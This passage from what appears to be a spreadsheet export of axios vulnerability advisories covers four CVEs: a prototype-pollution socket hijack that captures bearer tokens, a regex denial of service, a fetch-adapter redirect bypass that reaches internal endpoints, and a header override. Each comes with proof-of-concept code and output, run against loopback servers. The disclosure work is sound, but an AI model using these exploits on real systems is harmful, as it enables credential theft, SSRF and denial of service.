await axios.get('http://127.0.0.1:&lt;legit-port&gt;/secret', {
  headers: { Authorization: 'Bearer SECRET' },
  proxy: false
});
```
Expected safe behavior is that the legitimate server receives the request. Current affected behavior lets the attacker server receive the request and return the response.
## Workarounds
Run axios in a process where prototype pollution is not present. For high-risk internal clients, use a custom trusted transport or agent layer that sets and enforces its own connection creation behavior instead of allowing inherited Node request options to participate.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios' Node HTTP adapter remains exploitable as a read-side prototype-pollution gadget after the recent null-prototype hardening. This is not a claim that axios creates the prototype pollution source. The precondition is a separate upstream prototype pollution primitive in the same Node.js process.
When `Object.prototype.createConnection` is polluted, axios requests can be redirected to an attacker-controlled socket even though the adapter builds the request options with `Object.create(null)`. The request URL and axios config still appear to target the legitimate host, but the actual socket is attacker-controlled.
This allows credential exfiltration and response manipulation for later axios HTTP requests in a polluted process.
## Impact
Given an upstream prototype pollution primitive in the same process, an attacker can turn later axios HTTP requests into a man-in-the-middle primitive:
- redirect the underlying socket for axios requests to attacker-controlled infrastructure
- receive headers and request bodies intended for the legitimate target, including bearer tokens, cookies, API keys, and service credentials
- return attacker-controlled responses to the caller
- bypass application SSRF controls that validate the URL before calling axios, because the requested URL remains legitimate while the socket connects elsewhere
The important boundary here is axios' documented/read-side prototype-pollution hardening. The project threat model discusses polluted `Object.prototype` from transitive dependencies as an in-scope read-side gadget class where axios should avoid picking up inherited behavior-changing properties. This issue is a bypass of that hardening at the Node HTTP request-options boundary.
## Technical details
The HTTP adapter constructs a null-prototype request options object before calling the selected transport:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
That prevents direct inherited reads while the options object remains null-prototype. However, Node's HTTP client path copies or normalizes request options into ordinary objects before connection creation. After that copy, missing properties can resolve from `Object.prototype` again.
`createConnection` is a sensitive Node HTTP option. If it is inherited after this copy, Node calls the attacker-supplied function to create the socket.
## Reproduction
The following minimal proof uses a legitimate target server and an attacker server. It pollutes `Object.prototype.createConnection`, then makes an axios request to the legitimate server with an Authorization header.
```js
import net from 'node:net';
import http from 'node:http';
import axios from 'axios';
function listen(handler) {
  return new Promise(resolve =&gt; {
    const s = http.createServer(handler);
    s.listen(0, '127.0.0.1', () =&gt; resolve(s));
  });
}
const legitHits = [];
const attackerHits = [];
const legit = await listen((req, res) =&gt; {
  legitHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('LEGIT');
});
const attacker = await listen((req, res) =&gt; {
  attackerHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('ATTACKER');
});
Object.prototype.createConnection = function(options, cb) {
  const sock = net.createConnection({
    host: '127.0.0.1',
    port: attacker.address().port,
  }, () =&gt; {
    if (typeof cb === 'function') cb(null, sock);
  });
  return sock;
};
const res = await axios.get(`http://127.0.0.1:${legit.address().port}/secret`, {
  headers: {Authorization: 'Bearer SECRET'},
  proxy: false,
});
console.log({
  response: res.data,
  legitHits,
  attackerHits,
});
```
Observed result on the current npm package:
```json
{
  "response": "ATTACKER",
  "legitHits": [],
  "attackerHits": [
    {
      "url": "/secret",
      "auth": "Bearer SECRET"
    }
  ]
}
```
The request never reached the intended target. The attacker-controlled server received the Authorization header and supplied the response body returned by axios.
## Versions tested
I reproduced this against:
- axios 1.16.1 from npm
- axios 1.17.0 from npm
- current `v1.x` source at commit `a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b`
## Fix validation
Adding an own safe value for `createConnection` to the adapter options object prevents inherited pollution from being observed after Node's option copy:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
  createConnection: undefined,
});
```
With that guard in place, the same proof no longer calls the polluted function. The legitimate server receives the request, the attacker server receives nothing, and axios returns the legitimate response.
## Remediation
Set own safe defaults for sensitive Node HTTP request options before calling `transport.request`, at minimum:
```js
createConnection: undefined
```
I recommend reviewing other sensitive Node HTTP options that may be read after Node copies the request options into a normal object, especially connection/TLS-affecting fields such as `lookup`, `timeout`, `localAddress`, `servername`, `signal`, and related options.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D603" s="5" t="inlineStr"/>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M603" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr"/>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios `shouldBypassProxy()` normalizes hostnames with `hostname.replace(/\.+$/, '')`. For a hostname shaped as many dots followed by a non-dot, the anchored regex can perform quadratic backtracking. Because axios re-evaluates proxy bypass rules for redirected requests, a malicious server can trigger this synchronous work through a crafted redirect `Location`.
The issue affects Node.js applications that use environment proxy variables with `NO_PROXY` and allow redirects.
## Impact
An attacker-controlled server can return a redirect whose hostname causes the axios process to spend significant CPU time in synchronous hostname normalization. During this time, the Node.js event loop is blocked and the application cannot handle other work on that thread.
This is an availability-only issue. It does not disclose request data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- Environment proxy handling through `HTTP_PROXY` or `HTTPS_PROXY`.
- `NO_PROXY` or `no_proxy` set to a non-empty value.
- Redirects followed by axios or `follow-redirects`.
Not affected:
- Browser adapters.
- Requests with `proxy: false`.
- Requests with no `NO_PROXY` value.
- Requests with `maxRedirects: 0`, unless application code manually follows the malicious redirect and re-enters axios.
## Technical Details
`lib/helpers/shouldBypassProxy.js` contains:
```js
return unmapIPv4MappedIPv6(hostname.replace(/\.+$/, ''));
```
When the hostname is `"." * n + "a"`, the `$` anchor causes the regex engine to retry the dot run from many positions before it fails. `setProxy()` invokes `shouldBypassProxy(location)` after `getProxyForUrl(location)` returns a proxy, including on redirect hops via `beforeRedirects.proxy`.
Local timing on axios `1.18.1` showed increasing cost for crafted hostnames: about 1 ms at 1000 dots, 6.9 ms at 3000 dots, and 34.5 ms at 6000 dots. The growth is consistent with the submitted quadratic claim while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import shouldBypassProxy from 'axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
shouldBypassProxy('http://' + '.'.repeat(6000) + 'a/');
```
In the full adapter path, a malicious server can return that hostname in a `302 Location` header while the client has proxy environment variables and `NO_PROXY` configured.
## Workarounds
Disable automatic redirects for requests to untrusted servers, or avoid environment proxy handling for those requests with `proxy: false` when appropriate. Operators can also avoid broad untrusted redirect-following in services where event-loop availability is critical.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
shouldBypassProxy normalizes a host with hostname.replace(/\.+$/, ''). On a host of the shape &lt;many dots&gt;&lt;non-dot&gt; (e.g. "." × 40000 + "a"), this anchored regex backtracks quadratically (O(N²)), synchronously starving the Node.js event loop. Because axios re-evaluates the proxy on every redirect using the new Location host, a malicious server can return a crafted 302 Location and freeze the client's event loop for seconds per redirect — a denial of service.
### Details
- Affected code: lib/helpers/shouldBypassProxy.js → normalizeNoProxyHost: hostname.replace(/\.+$/, '') (one pass in 1.18.1). The open PR #11029 adds a second /\.+$/ pass in normalizeIPAddress, doubling the cost (not the origin).
- Root cause: /\.+$/ is O(N²) on a long run of dots that is not at the end of the string — the $ anchor forces the engine to backtrack the entire dot-run from every start position.
- Trust boundary (per THREATMODEL): the redirect Location is untrusted (T-2: "axios to network … redirect Location … untrusted"). The caller requests a benign URL; the malicious host arrives via the server's 302. This is not the T-1 caller-supplied-URL non-goal.
- Call chain: setProxy(options, configProxy, location, isRedirect, …) (lib/adapters/http.js) → env-proxy branch → getProxyForUrl(location) returns a proxy → if (!shouldBypassProxy(location)) → normalizeNoProxyHost(parsed.hostname.toLowerCase()) runs /\.+$/. setProxy is re-invoked on the redirect hop with the untrusted Location; new URL() retains the long dot-run in .hostname.
- Preconditions: proxy configured via environment (HTTP_PROXY/HTTPS_PROXY, trusted per THREATMODEL T-3, common in CI/containers/enterprise) + NO_PROXY set + redirects followed (default maxRedirects: 5).
### PoC
Self-contained, no network — imports axios's own helper:
// node poc.mjs   (run next to an axios install)
import sbp from './node_modules/axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
for (const n of [5000, 10000, 20000, 40000]) {
  const url = 'http://' + '.'.repeat(n) + 'a/';   // arrives as an untrusted 302 Location host
  const t0 = process.hrtime.bigint();
  sbp(url);                                         // returns false (correct no-bypass) — but O(N^2) slow
  console.log(`N=${n}: ${(Number(process.hrtime.bigint()-t0)/1e6)|0} ms`);
}
// Measured on 1.18.1: N=5000 ~43ms, 10000 ~160ms, 20000 ~618ms, 40000 ~2499ms; benign host ~0.05ms.
Driven through the real http-adapter __setProxy on the redirect path (setProxy(…, isRedirect=true)), a 10 ms timer fires 0 times during the ~2.4 s block at N=40000 — full event-loop starvation.
### Impact
Denial of service (event-loop starvation) on any axios client that uses an environment proxy with NO_PROXY set and follows redirects, when a server it contacts returns a crafted redirect Location. No data exposure or RCE. Same impact class as the accepted DoS advisories GHSA-62hf-57xw-28j9 (toFormData recursion) and the maxContentLength response-size DoS.
### Suggested fix
Replace the regex trailing-dot strip with a linear trim:
let end = hostname.length;
while (end &gt; 0 &amp;&amp; hostname.charCodeAt(end - 1) === 46 /* '.' */) end--;
hostname = hostname.slice(0, end);
Also drop the redundant second /\.+$/ pass in PR #11029's normalizeIPAddress.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D604" s="5" t="inlineStr"/>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M604" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr"/>
      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios exposes `maxRedirects` to limit redirect following, and `maxRedirects: 0` is used by applications as a redirect-based SSRF guard. The Node HTTP adapter enforces this option. The fetch adapter does not read it and does not set a Fetch API `redirect` mode, so the runtime default of `redirect: 'follow'` applies.
Applications are affected when they rely on `maxRedirects: 0` and use the fetch adapter, either explicitly or because the runtime selects it.
## Impact
An attacker who controls the initial URL or a redirecting server can cause a fetch-adapter request to follow a redirect even though the caller configured `maxRedirects: 0`. If the redirect target is reachable only from the application environment, this can expose internal responses or trigger state-changing internal endpoints.
This should not be described as unconditional SSRF. The bypass requires a redirect source, such as an attacker-controlled server or open redirect, and an application that trusted `maxRedirects: 0` as the redirect guard.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where fetch is selected by adapter resolution.
- Requests configured with `maxRedirects: 0` but without `fetchOptions.redirect: 'manual'` or equivalent runtime-specific redirect control.
Not affected:
- Node HTTP adapter, which enforces `maxRedirects: 0`.
- Requests that do not follow redirects in the underlying fetch implementation because the caller explicitly configured fetch redirect behavior.
## Technical Details
`lib/adapters/fetch.js` destructures many fields from `resolveConfig(config)`, but not `maxRedirects`. It then builds fetch options without a `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because `redirect` is absent, the Fetch API default is to follow redirects.
Local verification on axios `1.18.1` showed the HTTP adapter throwing with `maxRedirects: 0`, while the fetch adapter followed the same loopback `302` and returned the internal response.
## Proof of Concept of Attack
Constrained local demonstration:
1. Start server A that returns `302 Location: http://127.0.0.1:&lt;server-b&gt;/internal`.
2. Start server B that returns `INTERNAL`.
3. Compare:
```js
await axios.get(serverA, { adapter: 'http', maxRedirects: 0 });  // throws
await axios.get(serverA, { adapter: 'fetch', maxRedirects: 0 }); // returns INTERNAL
```
## Workarounds
For fetch-adapter requests, set `fetchOptions: { redirect: 'manual' }` where the runtime supports it, or use the Node HTTP adapter for requests that rely on axios redirect limits.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 exposes `maxRedirects` as a configuration option to limit redirect following, and setting it to `0` is a documented pattern for preventing redirect-based SSRF. The HTTP adapter enforces this via `follow-redirects`. The fetch adapter does not read `maxRedirects` at all - it passes requests to the underlying `fetch()` call with no `redirect` option, which defaults to `'follow'`, so redirects are followed by the runtime rather than being constrained by axios `maxRedirects`.
In the attached PoC, a request issued with `maxRedirects: 0` and `adapter: 'fetch'` follows a `302` redirect to an internal service and returns its response, while the same request with `adapter: 'http'` correctly throws. A second bypass case demonstrates that the redirect can reach a state-changing internal endpoint, not just read-only ones, proving both confidentiality and integrity impact.
This affects any application that sets `maxRedirects: 0` as a redirect guard and runs in an environment where the fetch adapter is active: Deno, Bun, Cloudflare Workers, or Node.js with `adapter: 'fetch'` set explicitly.
## Details
The fetch adapter destructures config fields from `resolveConfig` at `lib/adapters/fetch.js`:
```js
let {
  url, method, data, signal, cancelToken, timeout,
  onDownloadProgress, onUploadProgress, responseType,
  headers, withCredentials, fetchOptions,
  maxContentLength, maxBodyLength,
} = resolveConfig(config);
// maxRedirects is not extracted
```
The options object passed to `fetch()` has no `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,       // redirect only set here if caller explicitly passes fetchOptions.redirect
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because no `redirect` key is present, the Fetch API default of `redirect: 'follow'` applies, so redirects are handled by the runtime rather than constrained by axios `maxRedirects`. The HTTP adapter, by contrast, delegates to `follow-redirects`, which reads `maxRedirects`, enforces the cap, and strips `Authorization`, `Cookie`, and `Proxy-Authorization` on cross-origin redirects.
The discrepancy between adapters is not documented. The threat model covers credential stripping on redirects (T-R2) and cites `follow-redirects` as the mitigation, but makes no mention that the fetch adapter does not participate in this mitigation. See: https://github.com/axios/axios/blob/master/THREATMODEL.md#t-r2-credential-leakage-on-cross-origin-redirect
The behaviour difference between adapters is summarised below:
| Behaviour                              | HTTP adapter                    | Fetch adapter            |
|----------------------------------------|---------------------------------|--------------------------|
| Reads `config.maxRedirects`            | Yes                             | **No**                   |
| Enforces `maxRedirects: 0`             | Yes -- throws on any redirect   | **No -- follows silently**|
| Strips `Authorization` cross-origin    | Yes (`follow-redirects` &gt;=1.15.8)| Runtime-dependent       |
| Strips `Cookie` cross-origin           | Yes                             | Runtime-dependent        |
### When is the fetch adapter selected?
- **Deno, Bun, Cloudflare Workers:** no Node.js `http` module available; the adapter list falls through to `'fetch'`
- **Explicit config:** `axios.get(url, { adapter: 'fetch' })`
- **Custom adapter list:** `axios.create({ adapter: ['fetch'] })`
## PoC
```js
import http from 'http';
import axios from './index.js';
// Server A: the "trusted" external target, issues open redirects to Server B
const serverA = http.createServer((req, res) =&gt; {
  if (req.url === '/api/data') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/secrets' });
    return res.end();
  }
  if (req.url === '/api/change-config') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/admin/config' });
    return res.end();
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ ok: true }));
});
let internalHits = 0;
let internalConfig = {};
// Server B: the "internal" service, should be unreachable from the application
const serverB = http.createServer(async (req, res) =&gt; {
  internalHits++;
  if (req.url === '/internal/secrets') {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      secret: 'FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY',
      role:   'arn:aws:iam::000000000000:role/FakeProductionRole',
    }));
  }
  if (req.url === '/internal/admin/config') {
    internalConfig = { compromised: true, source: 'redirect-followed-by-fetch-adapter' };
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      reached: 'state-changing internal admin endpoint',
      changed: true,
      internalConfig,
    }));
  }
  res.writeHead(404);
  res.end();
});
await Promise.all([
  new Promise((resolve, reject) =&gt; { serverA.listen(13801, '127.0.0.1', resolve); serverA.on('error', reject); }),
  new Promise((resolve, reject) =&gt; { serverB.listen(13802, '127.0.0.1', resolve); serverB.on('error', reject); }),
]);
const targetUrl    = 'http://127.0.0.1:13801/api/data';
const changeUrl    = 'http://127.0.0.1:13801/api/change-config';
const internalUrl  = 'http://127.0.0.1:13802/internal/secrets';
const internalCfg  = 'http://127.0.0.1:13802/internal/admin/config';
console.log('Axios maxRedirects bypass via fetch adapter PoC');
console.log(`axios VERSION=${axios.VERSION}`);
console.log(`maxRedirects=0`);
console.log(`Target URL=${targetUrl}`);
console.log(`  redirects to ${internalUrl}`);
console.log(`Change URL=${changeUrl}`);
console.log(`  redirects to ${internalCfg}`);
console.log('');
// CONTROL: HTTP adapter correctly enforces maxRedirects: 0
let httpBlocked = false;
try {
  await axios.get(targetUrl, { maxRedirects: 0, adapter: 'http' });
  console.log('[CONTROL]  HTTP adapter + maxRedirects:0  BUG: should have thrown');
} catch (err) {
  httpBlocked = true;
  console.log(`[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (${err.code ?? err.message})`);
}
console.log(`[CONTROL]  Internal hits after HTTP adapter: ${internalHits}`);
// BYPASS: Fetch adapter silently ignores maxRedirects: 0
let fetchResponse = null;
try {
  fetchResponse = await axios.get(targetUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗');
  console.log('           Response:', JSON.stringify(fetchResponse.data));
} catch (err) {
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  redirect blocked (unexpected):', err.message);
}
console.log(`[BYPASS]   Internal hits after fetch adapter: ${internalHits}`);
// BYPASS: Fetch adapter follows redirect to state-changing internal endpoint
let changedResponse = null;
try {
  changedResponse = await axios.get(changeUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter state change:', JSON.stringify(changedResponse.data));
  console.log(`[BYPASS]   Internal hits after state change: ${internalHits}`);
} catch (err) {
  console.log('[BYPASS]   State change request blocked (unexpected):', err.message);
}
console.log('');
if (httpBlocked &amp;&amp; fetchResponse &amp;&amp; changedResponse) {
  console.log('POC RESULT: fetch adapter followed redirects despite maxRedirects:0,');
  console.log('            reaching internal service and mutating internal state.');
} else if (httpBlocked &amp;&amp; fetchResponse) {
  console.log('POC RESULT: fetch adapter followed redirect despite maxRedirects:0,');
  console.log('            reaching internal service that should have been unreachable.');
} else if (!httpBlocked) {
  console.log('POC RESULT: HTTP adapter did not block redirect -- unexpected, check axios version.');
} else {
  console.log('POC RESULT: fetch adapter blocked redirect -- issue may be fixed.');
}
serverA.close();
serverB.close();
```
Run:
```bash
node poc-max-redirects.mjs
```
Observed:
```text
Axios maxRedirects bypass via fetch adapter PoC
axios VERSION=1.17.0
maxRedirects=0
Target URL=http://127.0.0.1:13801/api/data
  redirects to http://127.0.0.1:13802/internal/secrets
Change URL=http://127.0.0.1:13801/api/change-config
  redirects to http://127.0.0.1:13802/internal/admin/config
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗
           Response: {"secret":"FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY","role":"arn:aws:iam::000000000000:role/FakeProductionRole"}
[BYPASS]   Internal hits after fetch adapter: 1
[BYPASS]   Fetch adapter state change: {"reached":"state-changing internal admin endpoint","changed":true,"internalConfig":{"compromised":true,"source":"redirect-followed-by-fetch-adapter"}}
[BYPASS]   Internal hits after state change: 2
POC RESULT: fetch adapter followed redirects despite maxRedirects:0,
            reaching internal service and mutating internal state.
```
## Control
Axios does correctly enforce `maxRedirects: 0` in the HTTP adapter. The `[CONTROL]` case above confirms this: the same request with `adapter: 'http'` throws rather than following the redirect, and the internal hit counter stays at `0`:
```text
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
```
The issue is not that `maxRedirects` is broken globally. It is enforced correctly for the HTTP adapter. The bypass is specific to the fetch adapter, which never reads the option and passes no `redirect` constraint to the underlying `fetch()` call.
## Impact
This is a redirect enforcement bypass affecting axios applications running in environments where the fetch adapter is active.
The internal admin route in the PoC simulates an affected deployment where a redirected request can reach state-changing internal APIs. The vulnerability is that `maxRedirects: 0` is silently ignored by the fetch adapter; the exact impact depends on what redirect targets are reachable from the runtime.
The impact is environment- and configuration-dependent. It affects axios users who:
- Set `maxRedirects: 0` as a defense against redirect-based SSRF, and
- Run in an environment where the fetch adapter is selected, either by runtime (Deno, Bun, Cloudflare Workers) or by explicit configuration
In these cases, a `302` redirect from the initial target is followed silently by default, unless the caller separately sets `fetchOptions.redirect`. If the redirect target is an internal service, the application returns its response to the caller with no indication that a redirect occurred or that `maxRedirects` was not honoured. The failure is silent: no error is thrown, no warning is logged.
The bypass is not limited to read-only access. As demonstrated by the second bypass case, a redirect to a state-changing internal endpoint succeeds equally. An attacker who can influence the redirect destination, for example through an open redirect on the initial target or a server they control, can reach internal and trigger mutations that the application never intended to issue.
Potentially affected environments include:
- Deno and Bun applications using axios where the fetch adapter is the default.
- Cloudflare Workers using axios, which has no Node.js `http` module.
- Node.js applications that explicitly configure `adapter: 'fetch'` or a custom adapter list that resolves to fetch.
- Any application that conditionally sets `maxRedirects: 0` and runs across multiple environments with different adapter selection.
Internal services reachable via a redirect include cloud instance metadata endpoints (`169.254.169.254`), unauthenticated local services such as Redis or internal admin APIs, and other hosts accessible from the application's network that are not intended to be reachable by the caller. The hit counter in the PoC makes the access concrete: `0` after the HTTP control, `1` after the confidentiality bypass, `2` after the integrity bypass.
This should not be characterised as an unconditional SSRF. The bypass requires either an open redirect on the initial target, or a URL that is itself a redirect. The issue is that `maxRedirects: 0`, which is the intended mitigation for this class of attack, is silently non-functional in the fetch adapter, leaving applications with a false sense of protection.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101908</t>
        </is>
      </c>
      <c r="D605" s="5" t="inlineStr"/>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M605" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr"/>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios fetch adapter requests can be altered by inherited properties on `fetchOptions`. The adapter resolves method, headers, body, signal, and credentials into `resolvedOptions`, creates a `Request`, and then calls `fetch(request, fetchOptions)` instead of `fetch(request, resolvedOptions)`. In runtimes such as Node's undici-backed fetch, inherited `fetchOptions.headers` can override the headers already placed on the `Request`.
Axios does not create the prototype pollution source. This is a read-side gadget that becomes exploitable after same-process prototype pollution.
## Impact
An attacker with a prior prototype-pollution primitive can cause affected fetch-adapter requests to send attacker-controlled headers and drop caller-specified headers. This can affect authorization, cache behavior, metadata-service interactions, or application-specific header-based controls.
The issue is specific to fetch-adapter behavior and does not affect Node HTTP adapter requests.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where the fetch adapter is selected.
- Requests where `fetchOptions` is an object that does not have safe own values for sensitive fetch init fields.
Not affected:
- Node HTTP adapter.
- Requests that do not use the fetch adapter.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/adapters/fetch.js` builds:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
request = isRequestSupported &amp;&amp; new Request(url, resolvedOptions);
let response = await (isRequestSupported
  ? _fetch(request, fetchOptions)
  : _fetch(url, resolvedOptions));
```
The fallback path without `Request` uses `resolvedOptions`, but the `Request` path passes the original `fetchOptions` as the second argument to `fetch()`. That second argument can contain inherited properties from `Object.prototype`.
Local verification on axios `1.18.1` set `Object.prototype.headers = { Authorization: 'Bearer POLLUTED' }` and called the fetch adapter with `headers: { 'X-Good': 'yes' }, fetchOptions: {}`. The loopback server received `Authorization: Bearer POLLUTED` and did not receive `X-Good`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { Authorization: 'Bearer POLLUTED' };
try {
  await axios.get(url, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
} finally {
  delete Object.prototype.headers;
}
```
Expected safe behavior is that the sanitized axios headers remain in force. Current behavior can use the inherited fetch init headers instead.
## Workarounds
Use the Node HTTP adapter for security-sensitive server-side requests until fixed. If the fetch adapter must be used, avoid passing empty `fetchOptions` objects in processes where prototype pollution is possible, and set explicit safe own values for fetch init fields.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hello, I’m not completely sure if this is something you’d consider a security issue, since it depends on prototype pollution happening somewhere else first, but I wanted to report it just in case.
I was testing the fetch adapter with polluted prototype values and found that `Object.prototype.headers` can change the request axios sends.
The issue seems to be in `lib/adapters/fetch.js`. Axios creates a `Request` with the resolved headers/method/body, but then sends it with `fetch(request, fetchOptions)`. With undici, if `fetchOptions` doesn’t have its own headers, an inherited `Object.prototype.headers` value can be used during the final fetch call.
I tested it with this:
